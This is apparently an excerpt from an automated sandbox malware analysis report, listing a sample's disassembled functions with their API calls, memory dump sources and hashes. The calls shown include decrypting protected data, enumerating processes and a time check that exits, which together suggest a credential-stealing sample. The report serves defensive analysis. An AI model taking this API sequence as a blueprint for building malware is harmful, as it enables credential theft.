                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: =J^n$P[k$Vbk{$jggn$o |$tUMg
                        • API String ID: 0-1730141673
                        • Opcode ID: 6469733ccab473227094a6e2981bd72c83f4787e17ad127c9777cabe37371e66
                        • Instruction ID: 242b40a6e51cf7df78612f356038984df2f714dbe7f5643c00f37e4430021b4b
                        • Opcode Fuzzy Hash: 6469733ccab473227094a6e2981bd72c83f4787e17ad127c9777cabe37371e66
                        • Instruction Fuzzy Hash: EBB217F360C2049FE7046E2DEC8567AFBE9EF94720F1A493DEAC5C3740EA7558018696
                        Function 0098E1D5 Relevance: 9.1, Strings: 6, Instructions: 1584COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2v{_$NeyW$T=x$Z[1]$eR]$b2
                        • API String ID: 0-2572319919
                        • Opcode ID: 7fbcc70a74b797d104e1ffb04547d2650e37b29c6fd406c780335df0f4569ab5
                        • Instruction ID: e5bbcf1ad8d4322bbae21e99c5601d0ba964ceb84a46706ffcd8abff29bc0406
                        • Opcode Fuzzy Hash: 7fbcc70a74b797d104e1ffb04547d2650e37b29c6fd406c780335df0f4569ab5
                        • Instruction Fuzzy Hash: 84B217F390C2049FE704AE2DEC8567ABBE9EF94720F16453DEAC4C7344EA3598058796
                        Function 005C9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                        • LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N\
                        • API String ID: 4291131564-3893816264
                        • Opcode ID: 0a191cba07ab55e7c1034c3f340b42ac9a9256abdda5225915e739b4f16b9964
                        • Instruction ID: 5d56217072e9df126ebe5b0b9c3d857b4668c72dd343ae0011878ac00f49fb88
                        • Opcode Fuzzy Hash: 0a191cba07ab55e7c1034c3f340b42ac9a9256abdda5225915e739b4f16b9964
                        • Instruction Fuzzy Hash: DA11A2B4240308BFEB14CFA4DC95FAA77B5FB89704F208058F9159B390C7B6A901CB90
                        Function 00996969 Relevance: 7.9, Strings: 5, Instructions: 1655COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0-Ev$]Z~$`+{$n)v$~/1=
                        • API String ID: 0-4148330775
                        • Opcode ID: a855b8925d7b461da36381b8bfa4c20796dc576db4bf834756655f7f99977079
                        • Instruction ID: b9336a4e0cb0bd5db022cc87120ff2e81b799872489fa337fc39edbe11fed404
                        • Opcode Fuzzy Hash: a855b8925d7b461da36381b8bfa4c20796dc576db4bf834756655f7f99977079
                        • Instruction Fuzzy Hash: 34B205F360C2049FE308AE2DEC5567AB7E5EBD4720F1A893DE6C5C7344EA3598018696
                        Function 005CC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005CC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005CC87C
                        • lstrcat.KERNEL32(?,005E0B46), ref: 005CC943
                        • lstrcat.KERNEL32(?,005E0B47), ref: 005CC957
                        • lstrcat.KERNEL32(?,005E0B4E), ref: 005CC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 270cf8d9a0537189995e4a4ef67beea1d681354e01fdbd20de09217e7b5762ed
                        • Instruction ID: 98de9b140f99da0bb13f497af93db49621889aac8ec6d99385eeea497282963f
                        • Opcode Fuzzy Hash: 270cf8d9a0537189995e4a4ef67beea1d681354e01fdbd20de09217e7b5762ed
                        • Instruction Fuzzy Hash: 94418FB590420EDFDB54CF90DD89FFEBBB8BB48304F1045A8E509A6280D770AA84CF91
                        Function 005D6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 005D696C
                        • sscanf.NTDLL ref: 005D6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005D69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005D69C0
                        • ExitProcess.KERNEL32 ref: 005D69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 8d5c73d74c14d683a41c1127ae5e056dd7f952cc5817fcf499e557127c88b7f6
                        • Instruction ID: dd4cc50086ad1e9498caca4e4b96ed32f3570bc1148eb5e270c13ecd52d45171
                        • Opcode Fuzzy Hash: 8d5c73d74c14d683a41c1127ae5e056dd7f952cc5817fcf499e557127c88b7f6
                        • Instruction Fuzzy Hash: 6421DF75D14209ABCF58EFE8D945AEEB7B5FF48300F04852EE406E3250EB345605CB69
                        Function 005C7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 005C724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005C7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005C72A4
                        • LocalFree.KERNEL32(?), ref: 005C72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 0e3630f2008ab53a81bd14c7080c5607704bd61f159c8bc6bd543b9f91b317d2
                        • Instruction ID: f89f2fc331611890e4f5a3a131d20a020017b30ed56bd083c3540ca1ef120c12
                        • Opcode Fuzzy Hash: 0e3630f2008ab53a81bd14c7080c5607704bd61f159c8bc6bd543b9f91b317d2
                        • Instruction Fuzzy Hash: 0E010075A40308BFEB54DBD4CD45F9D7BB8BB44700F108558FB05AA2C0D6B0AA018B65
                        Function 005D9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005D961E
                        • Process32First.KERNEL32(005E0ACA,00000128), ref: 005D9632
                        • Process32Next.KERNEL32(005E0ACA,00000128), ref: 005D9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 005D965C
                        • CloseHandle.KERNEL32(005E0ACA), ref: 005D967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 06a118e4bddccfb289a5ca97c55672db70aae150a67d5354c414244b2938226c
                        • Instruction ID: 3f2278d56819756fe927c67b9da74e2d3033791547277e6c42ce9f4249eea4e5
                        • Opcode Fuzzy Hash: 06a118e4bddccfb289a5ca97c55672db70aae150a67d5354c414244b2938226c
                        • Instruction Fuzzy Hash: 9E010C75A00308ABDB64DFA5CD48BEDBBF8FB48700F10819AA905A6340D734DB40CF51
                        Function 005D8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,005C5184,40000001,00000000,00000000,?,005C5184), ref: 005D8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: be41911feca92c719a471f8cee984ba0b682996ff98bc664cefb5e45675bb836
                        • Instruction ID: 27a6a531f81f35474c4e75d64ddc4cd2db7051d96185d4d14184294124986492
                        • Opcode Fuzzy Hash: be41911feca92c719a471f8cee984ba0b682996ff98bc664cefb5e45675bb836
                        • Instruction Fuzzy Hash: 22110674200209BFDB54CF68D884FBA3BAABF89300F10995AF919CB350DB35E841DB60
                        Function 005D7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,014B0048,00000000,?,005E0E10,00000000,?,00000000,00000000), ref: 005D7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,014B0048,00000000,?,005E0E10,00000000,?,00000000,00000000,?), ref: 005D7A7D
                        • wsprintfA.USER32 ref: 005D7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: daa4cec5c0a63076861bf8ce352b758e29da89c0a0549f3283f1d94e15b96dc6
                        • Instruction ID: 15090cf1752efefa20e2906e3e981bed9440c4ff728ebdebf782ba32a5456ddd
                        • Opcode Fuzzy Hash: daa4cec5c0a63076861bf8ce352b758e29da89c0a0549f3283f1d94e15b96dc6
                        • Instruction Fuzzy Hash: B5115EB1A45218EBEB64CB58DC49FA9BB78FB04721F1047AAE91A932C0D7745A40CF51
                        Function 0098AC3B Relevance: 5.4, Strings: 3, Instructions: 1660COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1"o$ZnM$"s<
                        • API String ID: 0-1236542812
                        • Opcode ID: 6b622f83f2423f3232e4cb06f4d2f1bdd6bdba29c91ed6cea7dc89af3d4a7a0c
                        • Instruction ID: 259b1a9766389324051a68de4640c0330d0e479db93a308a5e8ad45dd80af74e
                        • Opcode Fuzzy Hash: 6b622f83f2423f3232e4cb06f4d2f1bdd6bdba29c91ed6cea7dc89af3d4a7a0c
                        • Instruction Fuzzy Hash: 13B229F3A0C210AFD3046E2DEC8567AF7E9EF94320F1A493DEAC5C3744EA7558058696
                        Function 009932C9 Relevance: 5.3, Strings: 3, Instructions: 1566COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: F8|$hQ$yO=
                        • API String ID: 0-4158459939
                        • Opcode ID: 58c5f7520bf012fcc5ad1ca391ab1c59468e7f8e5f729cbb183a965ee91c23a1
                        • Instruction ID: 0ebbca0b7d02a7d182d15fc63135f4e421ddd088eb422682a0743b9861ab2434
                        • Opcode Fuzzy Hash: 58c5f7520bf012fcc5ad1ca391ab1c59468e7f8e5f729cbb183a965ee91c23a1
